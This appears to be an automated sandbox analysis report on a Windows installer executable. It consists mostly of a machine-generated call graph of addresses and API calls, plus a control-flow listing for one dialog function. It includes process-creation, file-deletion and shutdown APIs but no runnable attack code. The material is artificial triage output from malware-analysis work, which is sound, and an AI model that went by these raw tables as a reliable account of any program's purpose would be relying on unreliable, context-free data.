GetSystemMenu EnableMenuItem SendMessageW 3494 4057c2 SendMessageW 3493->3494 3493->3495 3494->3495 3495->3493 3518 403dc4 SendMessageW 3495->3518 3519 406035 lstrcpynW 3495->3519 3498 4057f0 lstrlenW 3499 406831 18 API calls 3498->3499 3500 405806 SetWindowTextW 3499->3500 3520 40139d 3500->3520 3502->3463 3503 405864 CreateDialogParamW 3502->3503 3503->3463 3504 405897 3503->3504 3505 403d6b 19 API calls 3504->3505 3506 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3505->3506 3507 40139d 80 API calls 3506->3507 3508 4058e8 3507->3508 3508->3456 3509 4058f0 ShowWindow 3508->3509 3510 403ddb SendMessageW 3509->3510 3510->3463 3512 403df3 3511->3512 3513 403de4 SendMessageW 3511->3513 3512->3480 3513->3512 3515 406831 18 API calls 3514->3515 3516 403d76 SetDlgItemTextW 3515->3516 3516->3488 3517->3492 3518->3495 3519->3498 3523 4013a4 3520->3523 3521 401410 3521->3480 3523->3521 3524 4013dd MulDiv SendMessageW 3523->3524 3545 4015a0 3523->3545 3524->3523 3526 40139d 80 API calls 3525->3526 3527 401432 3526->3527 3527->3486 3529 403d51 SendMessageW 3528->3529 3530 403d4b 3528->3530 3529->3479 3530->3529 3532 403e0b GetWindowLongW 3531->3532 3542 403e94 3531->3542 3533 403e1c 3532->3533 3532->3542 3534 403e2b GetSysColor 3533->3534 3535 403e2e 3533->3535 3534->3535 3536 403e34 SetTextColor 3535->3536 3537 403e3e SetBkMode 3535->3537 3536->3537 3538 403e56 GetSysColor 3537->3538 3539 403e5c 3537->3539 3538->3539 3540 403e63 SetBkColor 3539->3540 3541 403e6d 3539->3541 3540->3541 3541->3542 3543 403e80 DeleteObject 3541->3543 3544 403e87 CreateBrushIndirect 3541->3544 3542->3456 3543->3544 3544->3542 3546 4015fa 3545->3546 3625 40160c 3545->3625 3547 401601 3546->3547 3548 401742 3546->3548 3549 401962 3546->3549 3550 4019ca 3546->3550 3551 40176e 3546->3551 3552 401650 3546->3552 3553 4017b1 3546->3553 3554 401672 3546->3554 3555 401693 3546->3555 3556 401616 3546->3556 3557 4016d6 3546->3557 3558 401736 3546->3558 3559 401897 3546->3559 3560 4018db 3546->3560 3561 40163c 3546->3561 3562 4016bd 3546->3562 3546->3625 3571 4062cf 11 API calls 3547->3571 3563 401751 ShowWindow 3548->3563 3564 401758 3548->3564 3568 40145c 18 API calls 3549->3568 3575 40145c 18 API calls 3550->3575 3565 40145c 18 API calls 3551->3565 3589 4062cf 11 API calls 3552->3589 3569 40145c 18 API calls 3553->3569 3566 40145c 18 API calls 3554->3566 3570 401446 18 API calls 3555->3570 3574 40145c 18 API calls 3556->3574 3588 401446 18 API calls 3557->3588 3557->3625 3558->3625 3679 405f7d wsprintfW 3558->3679 3567 40145c 18 API calls 3559->3567 3572 40145c 18 API calls 3560->3572 3576 401647 PostQuitMessage 3561->3576 3561->3625 3573 4062cf 11 API calls 3562->3573 3563->3564 3577 401765 ShowWindow 3564->3577 3564->3625 3578 401775 3565->3578 3579 401678 3566->3579 3580 40189d 3567->3580 3581 401968 GetFullPathNameW 3568->3581 3582 4017b8 3569->3582 3583 40169a 3570->3583 3571->3625 3584 4018e2 3572->3584 3585 4016c7 SetForegroundWindow 3573->3585 3586 40161c 3574->3586 3587 4019d1 SearchPathW 3575->3587 3576->3625 3577->3625 3591 4062cf 11 API calls 3578->3591 3592 4062cf 11 API calls 3579->3592 3670 406301 FindFirstFileW 3580->3670 3594 4019a1 3581->3594 3595 40197f 3581->3595 3596 4062cf 11 API calls 3582->3596 3597 4062cf 11 API calls 3583->3597 3598 40145c 18 API calls 3584->3598 3585->3625 3599 4062cf 11 API calls 3586->3599 3587->3558 3587->3625 3588->3625 3600 401664 3589->3600 3601 401785 SetFileAttributesW 3591->3601 3602 401683 3592->3602 3614 4019b8 GetShortPathNameW 3594->3614 3594->3625 3595->3594 3620 406301 2 API calls 3595->3620 3604 4017c9 3596->3604 3605 4016a7 Sleep 3597->3605 3606 4018eb 3598->3606 3607 401627 3599->3607 3608 40139d 65 API calls 3600->3608 3609 40179a 3601->3609 3601->3625 3618 404f9e 25 API calls 3602->3618 3652 405d85 CharNextW CharNextW 3604->3652 3605->3625 3615 40145c 18 API calls 3606->3615 3616 404f9e 25 API calls 3607->3616 3608->3625 3617 4062cf 11 API calls 3609->3617 3610 4018c2 3621 4062cf 11 API calls 3610->3621 3611 4018a9 3619 4062cf 11 API calls 3611->3619 3614->3625 3623 4018f5 3615->3623 3616->3625 3617->3625 3618->3625 3619->3625 3624 401991 3620->3624 3621->3625 3622 4017d4 3626 401864 3622->3626 3629 405d32 CharNextW 3622->3629 3647 4062cf 11 API calls 3622->3647 3627 4062cf 11 API calls 3623->3627 3624->3594 3678 406035 lstrcpynW 3624->3678 3625->3523 3626->3602 3628 40186e 3626->3628 3630 401902 MoveFileW 3627->3630 3658 404f9e 3628->3658 3633 4017e6 CreateDirectoryW 3629->3633 3634 401912 3630->3634 3635 40191e 3630->3635 3633->3622 3637 4017fe GetLastError 3633->3637 3634->3602 3641 406301 2 API calls 3635->3641 3651 401942 3635->3651 3639 401827 GetFileAttributesW 3637->3639 3640 40180b GetLastError 3637->3640 3639->3622 3644 4062cf 11 API calls 3640->3644 3645 401929 3641->3645 3642 401882 SetCurrentDirectoryW 3642->3625 3643 4062cf 11 API calls 3646 40195c 3643->3646 3644->3622 3645->3651 3673 406c94 3645->3673 3646->3625 3647->3622 3650 404f9e 25 API calls 3650->3651 3651->3643 3653 405da2 3652->3653 3656 405db4 3652->3656 3655 405daf CharNextW 3653->3655 3653->3656 3654 405dd8 3654->3622 3655->3654 3656->3654 3657 405d32 CharNextW 3656->3657 3657->3656 3659 404fb7 3658->3659 3660 401875 3658->3660 3661 404fd5 lstrlenW 3659->3661 3662 406831 18 API calls 3659->3662 3669 406035 lstrcpynW 3660->3669 3663 404fe3 lstrlenW 3661->3663 3664 404ffe 3661->3664 3662->3661 3663->3660 3665 404ff5 lstrcatW 3663->3665 3666 405011 3664->3666 3667 405004 SetWindowTextW 3664->3667 3665->3664 3666->3660 3668 405017 SendMessageW SendMessageW SendMessageW 3666->3668 3667->3666 3668->3660 3669->3642 3671 4018a5 3670->3671 3672 406317 FindClose 3670->3672 3671->3610 3671->3611 3672->3671 3680 406328 GetModuleHandleA 3673->3680 3677 401936 3677->3650 3678->3594 3679->3625 3681 406340 LoadLibraryA 3680->3681 3682 40634b GetProcAddress 3680->3682 3681->3682 3683 406359 3681->3683 3682->3683 3683->3677 3684 406ac5 lstrcpyW 3683->3684 3685 406b13 GetShortPathNameW 3684->3685 3686 406aea 3684->3686 3687 406b2c 3685->3687 3688 406c8e 3685->3688 3710 405e7c GetFileAttributesW CreateFileW 3686->3710 3687->3688 3691 406b34 WideCharToMultiByte 3687->3691 3688->3677 3690 406af3 CloseHandle GetShortPathNameW 3690->3688 3692 406b0b 3690->3692 3691->3688 3693 406b51 WideCharToMultiByte 3691->3693 3692->3685 3692->3688 3693->3688 3694 406b69 wsprintfA 3693->3694 3695 406831 18 API calls 3694->3695 3696 406b95 3695->3696 3711 405e7c GetFileAttributesW CreateFileW 3696->3711 3698 406ba2 3698->3688 3699 406baf GetFileSize GlobalAlloc 3698->3699 3700 406bd0 ReadFile 3699->3700 3701 406c84 CloseHandle 3699->3701 3700->3701 3702 406bea 3700->3702 3701->3688 3702->3701 3712 405de2 lstrlenA 3702->3712 3705 406c03 lstrcpyA 3708 406c25 3705->3708 3706 406c17 3707 405de2 4 API calls 3706->3707 3707->3708 3709 406c5c SetFilePointer WriteFile GlobalFree 3708->3709 3709->3701 3710->3690 3711->3698 3713 405e23 lstrlenA 3712->3713 3714 405e2b 3713->3714 3715 405dfc lstrcmpiA 3713->3715 3714->3705 3714->3706 3715->3714 3716 405e1a CharNextA 3715->3716 3716->3713 4865 402da5 4866 4030e3 4865->4866 4867 402dac 4865->4867 4868 401446 18 API calls 4867->4868 4869 402db8 4868->4869 4870 402dbf SetFilePointer 4869->4870 4870->4866 4871 402dcf 4870->4871 4871->4866 4873 405f7d wsprintfW 4871->4873 4873->4866 4874 4049a8 GetDlgItem GetDlgItem 4875 4049fe 7 API calls 4874->4875 4880 404c16 4874->4880 4876 404aa2 DeleteObject 4875->4876 4877 404a96 SendMessageW 4875->4877 4878 404aad 4876->4878 4877->4876 4881 404ae4 4878->4881 4884 406831 18 API calls 4878->4884 4879 404cfb 4882 404da0 4879->4882 4883 404c09 4879->4883 4888 404d4a SendMessageW 4879->4888 4880->4879 4892 40487a 5 API calls 4880->4892 4905 404c86 4880->4905 4887 403d6b 19 API calls 4881->4887 4885 404db5 4882->4885 4886 404da9 SendMessageW 4882->4886 4889 403df6 8 API calls 4883->4889 4890 404ac6 SendMessageW SendMessageW 4884->4890 4897 404dc7 ImageList_Destroy 4885->4897 4898 404dce 4885->4898 4903 404dde 4885->4903 4886->4885 4893 404af8 4887->4893 4888->4883 4895 404d5f SendMessageW 4888->4895 4896 404f97 4889->4896 4890->4878 4891 404ced SendMessageW 4891->4879 4892->4905 4899 403d6b 19 API calls 4893->4899 4894 404f48 4894->4883 4904 404f5d ShowWindow GetDlgItem ShowWindow 4894->4904 4900 404d72 4895->4900 4897->4898 4901 404dd7 GlobalFree 4898->4901 4898->4903 4907 404b09 4899->4907 4909 404d83 SendMessageW 4900->4909 4901->4903 4902 404bd6 GetWindowLongW SetWindowLongW 4906 404bf0 4902->4906 4903->4894 4908 40141d 80 API calls 4903->4908 4918 404e10 4903->4918 4904->4883 4905->4879 4905->4891 4910 404bf6 ShowWindow 4906->4910 4911 404c0e 4906->4911 4907->4902 4913 404b65 SendMessageW 4907->4913 4914 404bd0 4907->4914 4916 404b93 SendMessageW 4907->4916 4917 404ba7 SendMessageW 4907->4917 4908->4918 4909->4882 4925 403dc4 SendMessageW 4910->4925 4926 403dc4 SendMessageW 4911->4926 4913->4907 4914->4902 4914->4906 4916->4907 4917->4907 4919 404e54 4918->4919 4922 404e3e SendMessageW 4918->4922 4920 404f1f InvalidateRect 4919->4920 4924 404ecd SendMessageW SendMessageW 4919->4924 4920->4894 4921 404f35 4920->4921 4923 4043d9 21 API calls 4921->4923 4922->4919 4923->4894 4924->4919 4925->4883 4926->4880 4927 4030a9 SendMessageW 4928 4030c2 InvalidateRect 4927->4928 4929 4030e3 4927->4929 4928->4929 3891 4038af #17 SetErrorMode OleInitialize 3892 406328 3 API calls 3891->3892 3893 4038f2 SHGetFileInfoW 3892->3893 3965 406035 lstrcpynW 3893->3965 3895 40391d GetCommandLineW 3966 406035 lstrcpynW 3895->3966 3897 40392f GetModuleHandleW 3898 403947 3897->3898 3899 405d32 CharNextW 3898->3899 3900 403956 CharNextW 3899->3900 3911 403968 3900->3911 3901 403a02 3902 403a21 GetTempPathW 3901->3902 3967 4037f8 3902->3967 3904 403a37 3906 403a3b GetWindowsDirectoryW lstrcatW 3904->3906 3907 403a5f DeleteFileW 3904->3907 3905 405d32 CharNextW 3905->3911 3909 4037f8 11 API calls 3906->3909 3975 4035b3 GetTickCount GetModuleFileNameW 3907->3975 3912 403a57 3909->3912 3910 403a73 3913 403af8 3910->3913 3915 405d32 CharNextW 3910->3915 3951 403add 3910->3951 3911->3901 3911->3905 3918 403a04 3911->3918 3912->3907 3912->3913 4060 403885 3913->4060 3919 403a8a 3915->3919 4067 406035 lstrcpynW 3918->4067 3930 403b23 lstrcatW lstrcmpiW 3919->3930 3931 403ab5 3919->3931 3920 403aed 3923 406113 9 API calls 3920->3923 3921 403bfa 3924 403c7d 3921->3924 3926 406328 3 API calls 3921->3926 3922 403b0d 3925 405ccc MessageBoxIndirectW 3922->3925 3923->3913 3927 403b1b ExitProcess 3925->3927 3929 403c09 3926->3929 3933 406328 3 API calls 3929->3933 3930->3913 3932 403b3f CreateDirectoryW SetCurrentDirectoryW 3930->3932 4068 4067aa 3931->4068 3935 403b62 3932->3935 3936 403b57 3932->3936 3937 403c12 3933->3937 4085 406035 lstrcpynW 3935->4085 4084 406035 lstrcpynW 3936->4084 3941 406328 3 API calls 3937->3941 3944 403c1b 3941->3944 3943 403b70 4086 406035 lstrcpynW 3943->4086 3945 403c69 ExitWindowsEx 3944->3945 3950 403c29 GetCurrentProcess 3944->3950 3945->3924 3949 403c76 3945->3949 3946 403ad2 4083 406035 lstrcpynW 3946->4083 3952 40141d 80 API calls 3949->3952 3954 403c39 3950->3954 4003 405958 3951->4003 3952->3924 3953 406831 18 API calls 3955 403b98 DeleteFileW 3953->3955 3954->3945 3956 403ba5 CopyFileW 3955->3956 3962 403b7f 3955->3962 3956->3962 3957 403bee 3958 406c94 42 API calls 3957->3958 3960 403bf5 3958->3960 3959 406c94 42 API calls 3959->3962 3960->3913 3961 406831 18 API calls 3961->3962 3962->3953 3962->3957 3962->3959 3962->3961 3964 403bd9 CloseHandle 3962->3964 4087 405c6b CreateProcessW 3962->4087 3964->3962 3965->3895 3966->3897 3968 406064 5 API calls 3967->3968 3969 403804 3968->3969 3970 40380e 3969->3970 3971 40674e 3 API calls 3969->3971 3970->3904 3972 403816 CreateDirectoryW 3971->3972 3973 405eab 2 API calls 3972->3973 3974 40382a 3973->3974 3974->3904 4090 405e7c GetFileAttributesW CreateFileW 3975->4090 3977 4035f3 3997 403603 3977->3997 4091 406035 lstrcpynW 3977->4091 3979 403619 4092 40677d lstrlenW 3979->4092 3983 40362a GetFileSize 3984 403726 3983->3984 3998 403641 3983->3998 4097 4032d2 3984->4097 3986 40372f 3988 40376b GlobalAlloc 3986->3988 3986->3997 4109 403368 SetFilePointer 3986->4109 3987 403336 ReadFile 3987->3998 4108 403368 SetFilePointer 3988->4108 3991 4037e9 3994 4032d2 6 API calls 3991->3994 3992 403786 3995 40337f 33 API calls 3992->3995 3993 40374c 3996 403336 ReadFile 3993->3996 3994->3997 4001 403792 3995->4001 4000 403757 3996->4000 3997->3910 3998->3984 3998->3987 3998->3991 3998->3997 3999 4032d2 6 API calls 3998->3999 3999->3998 4000->3988 4000->3997 4001->3997 4001->4001 4002 4037c0 SetFilePointer 4001->4002 4002->3997 4004 406328 3 API calls 4003->4004 4005 40596c 4004->4005 4006 405972 4005->4006 4007 405984 4005->4007 4123 405f7d wsprintfW 4006->4123 4008 405eff 3 API calls 4007->4008 4009 4059b5 4008->4009 4011 4059d4 lstrcatW 4009->4011 4013 405eff 3 API calls 4009->4013 4012 405982 4011->4012 4114 403ec1 4012->4114 4013->4011 4016 4067aa 18 API calls 4017 405a06 4016->4017 4018 405a9c 4017->4018 4020 405eff 3 API calls 4017->4020 4019 4067aa 18 API calls 4018->4019 4021 405aa2 4019->4021 4022 405a38 4020->4022 4023 405ab2 4021->4023 4024 406831 18 API calls 4021->4024 4022->4018 4026 405a5b lstrlenW 4022->4026 4029 405d32 CharNextW 4022->4029 4025 405ad2 LoadImageW 4023->4025 4125 403ea0 4023->4125 4024->4023 4027 405b92 4025->4027 4028 405afd RegisterClassW 4025->4028 4030 405a69 lstrcmpiW 4026->4030 4031 405a8f 4026->4031 4035 40141d 80 API calls 4027->4035 4033 405b9c 4028->4033 4034 405b45 SystemParametersInfoW CreateWindowExW 4028->4034 4036 405a56 4029->4036 4030->4031 4037 405a79 GetFileAttributesW 4030->4037 4039 40674e 3 API calls 4031->4039 4033->3920 4034->4027 4040 405b98 4035->4040 4036->4026 4041 405a85 4037->4041 4038 405ac8 4038->4025 4042 405a95 4039->4042 4040->4033 4043 403ec1 19 API calls 4040->4043 4041->4031 4044 40677d 2 API calls 4041->4044 4124 406035 lstrcpynW 4042->4124 4046 405ba9 4043->4046 4044->4031 4047 405bb5 ShowWindow LoadLibraryW 4046->4047 4048 405c38 4046->4048 4049 405bd4 LoadLibraryW 4047->4049 4050 405bdb GetClassInfoW 4047->4050 4051 405073 83 API calls 4048->4051 4049->4050 4052 405c05 DialogBoxParamW 4050->4052 4053 405bef GetClassInfoW RegisterClassW 4050->4053 4054 405c3e 4051->4054 4057 40141d 80 API calls 4052->4057 4053->4052 4055 405c42 4054->4055 4056 405c5a 4054->4056 4055->4033 4059 40141d 80 API calls 4055->4059 4058 40141d 80 API calls 4056->4058 4057->4033 4058->4033 4059->4033 4061 40389d 4060->4061 4062 40388f CloseHandle 4060->4062 4132 403caf 4061->4132 4062->4061 4067->3902 4185 406035 lstrcpynW 4068->4185 4070 4067bb 4071 405d85 4 API calls 4070->4071 4072 4067c1 4071->4072 4073 406064 5 API calls 4072->4073 4080 403ac3 4072->4080 4076 4067d1 4073->4076 4074 406809 lstrlenW 4075 406810 4074->4075 4074->4076 4078 40674e 3 API calls 4075->4078 4076->4074 4077 406301 2 API calls 4076->4077 4076->4080 4081 40677d 2 API calls 4076->4081 4077->4076 4079 406816 GetFileAttributesW 4078->4079 4079->4080 4080->3913 4082 406035 lstrcpynW 4080->4082 4081->4074 4082->3946 4083->3951 4084->3935 4085->3943 4086->3962 4088 405ca6 4087->4088 4089 405c9a CloseHandle 4087->4089 4088->3962 4089->4088 4090->3977 4091->3979 4093 40678c 4092->4093 4094 406792 CharPrevW 4093->4094 4095 40361f 4093->4095 4094->4093 4094->4095 4096 406035 lstrcpynW 4095->4096 4096->3983 4098 4032f3 4097->4098 4099 4032db 4097->4099 4102 403303 GetTickCount 4098->4102 4103 4032fb 4098->4103 4100 4032e4 DestroyWindow 4099->4100 4101 4032eb 4099->4101 4100->4101 4101->3986 4105 403311 CreateDialogParamW ShowWindow 4102->4105 4106 403334 4102->4106 4110 40635e 4103->4110 4105->4106 4106->3986 4108->3992 4109->3993 4111 40637b PeekMessageW 4110->4111 4112 406371 DispatchMessageW 4111->4112 4113 403301 4111->4113 4112->4111 4113->3986 4115 403ed5 4114->4115 4130 405f7d wsprintfW 4115->4130 4117 403f49 4118 406831 18 API calls 4117->4118 4119 403f55 SetWindowTextW 4118->4119 4120 403f70 4119->4120 4121 403f8b 4120->4121 4122 406831 18 API calls 4120->4122 4121->4016 4122->4120 4123->4012 4124->4018 4131 406035 lstrcpynW 4125->4131 4127 403eb4 4128 40674e 3 API calls 4127->4128 4129 403eba lstrcatW 4128->4129 4129->4038 4130->4117 4131->4127 4133 403cbd 4132->4133 4134 4038a2 4133->4134 4135 403cc2 FreeLibrary GlobalFree 4133->4135 4136 406cc7 4134->4136 4135->4134 4135->4135 4137 4067aa 18 API calls 4136->4137 4138 406cda 4137->4138 4139 406ce3 DeleteFileW 4138->4139 4140 406cfa 4138->4140 4179 4038ae CoUninitialize 4139->4179 4141 406e77 4140->4141 4183 406035 lstrcpynW 4140->4183 4147 406301 2 API calls 4141->4147 4167 406e84 4141->4167 4141->4179 4143 406d25 4144 406d39 4143->4144 4145 406d2f lstrcatW 4143->4145 4148 40677d 2 API calls 4144->4148 4146 406d3f 4145->4146 4150 406d4f lstrcatW 4146->4150 4152 406d57 lstrlenW FindFirstFileW 4146->4152 4149 406e90 4147->4149 4148->4146 4153 40674e 3 API calls 4149->4153 4149->4179 4150->4152 4151 4062cf 11 API calls 4151->4179 4156 406e67 4152->4156 4180 406d7e 4152->4180 4154 406e9a 4153->4154 4157 4062cf 11 API calls 4154->4157 4155 405d32 CharNextW 4155->4180 4156->4141 4158 406ea5 4157->4158 4159 405e5c 2 API calls 4158->4159 4160 406ead RemoveDirectoryW 4159->4160 4164 406ef0 4160->4164 4165 406eb9 4160->4165 4161 406e44 FindNextFileW 4163 406e5c FindClose 4161->4163 4161->4180 4163->4156 4166 404f9e 25 API calls 4164->4166 4165->4167 4168 406ebf 4165->4168 4166->4179 4167->4151 4170 4062cf 11 API calls 4168->4170 4169 4062cf 11 API calls 4169->4180 4171 406ec9 4170->4171 4174 404f9e 25 API calls 4171->4174 4172 406cc7 72 API calls 4172->4180 4173 405e5c 2 API calls 4175 406dfa DeleteFileW 4173->4175 4176 406ed3 4174->4176 4175->4180 4177 406c94 42 API calls 4176->4177 4177->4179 4178 404f9e 25 API calls 4178->4161 4179->3921 4179->3922 4180->4155 4180->4161 4180->4169 4180->4172 4180->4173 4180->4178 4181 404f9e 25 API calls 4180->4181 4182 406c94 42 API calls 4180->4182 4184 406035 lstrcpynW 4180->4184 4181->4180 4182->4180 4183->4143 4184->4180 4185->4070 4930 401cb2 4931 40145c 18 API calls 4930->4931 4932 401c54 4931->4932 4933 4062cf 11 API calls 4932->4933 4934 401c64 4932->4934 4935 401c59 4933->4935 4936 406cc7 81 API calls 4935->4936 4936->4934 3717 4021b5 3718 40145c 18 API calls 3717->3718 3719 4021bb 3718->3719 3720 40145c 18 API calls 3719->3720 3721 4021c4 3720->3721 3722 40145c 18 API calls 3721->3722 3723 4021cd 3722->3723 3724 40145c 18 API calls 3723->3724 3725 4021d6 3724->3725 3726 404f9e 25 API calls 3725->3726 3727 4021e2 ShellExecuteW 3726->3727 3728 40221b 3727->3728 3729 40220d 3727->3729 3730 4062cf 11 API calls 3728->3730 3731 4062cf 11 API calls 3729->3731 3732 402230 3730->3732 3731->3728 4937 402238 4938 40145c 18 API calls 4937->4938 4939 40223e 4938->4939 4940 4062cf 11 API calls 4939->4940 4941 40224b 4940->4941 4942 404f9e 25 API calls 4941->4942 4943 402255 4942->4943 4944 405c6b 2 API calls 4943->4944 4945 40225b 4944->4945 4946 4062cf 11 API calls 4945->4946 4954 4022ac CloseHandle 4945->4954 4951 40226d 4946->4951 4948 4030e3 4949 402283 WaitForSingleObject 4950 402291 GetExitCodeProcess 4949->4950 4949->4951 4953 4022a3 4950->4953 4950->4954 4951->4949 4952 40635e 2 API calls 4951->4952 4951->4954 4952->4949 4956 405f7d wsprintfW 4953->4956 4954->4948 4956->4954 4957 404039 4958 404096 4957->4958 4959 404046 lstrcpynA lstrlenA 4957->4959 4959->4958 4960 404077 4959->4960 4960->4958 4961 404083 GlobalFree 4960->4961 4961->4958 4962 401eb9 4963 401f24 4962->4963 4966 401ec6 4962->4966 4964 401f53 GlobalAlloc 4963->4964 4968 401f28 4963->4968 4970 406831 18 API calls 4964->4970 4965 401ed5 4969 4062cf 11 API calls 4965->4969 4966->4965 4972 401ef7 4966->4972 4967 401f36 4986 406035 lstrcpynW 4967->4986 4968->4967 4971 4062cf 11 API calls 4968->4971 4981 401ee2 4969->4981 4974 401f46 4970->4974 4971->4967 4984 406035 lstrcpynW 4972->4984 4976 402708 4974->4976 4977 402387 GlobalFree 4974->4977 4977->4976 4978 401f06 4985 406035 lstrcpynW 4978->4985 4979 406831 18 API calls 4979->4981 4981->4976 4981->4979 4982 401f15 4987 406035 lstrcpynW 4982->4987 4984->4978 4985->4982 4986->4974 4987->4976

                                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                                            Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295windowclipboardmemoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                                                                                                                                                              • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                              • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                                                                                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                                                                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                                                                                                                                                            • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                                                                                                                                                            • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
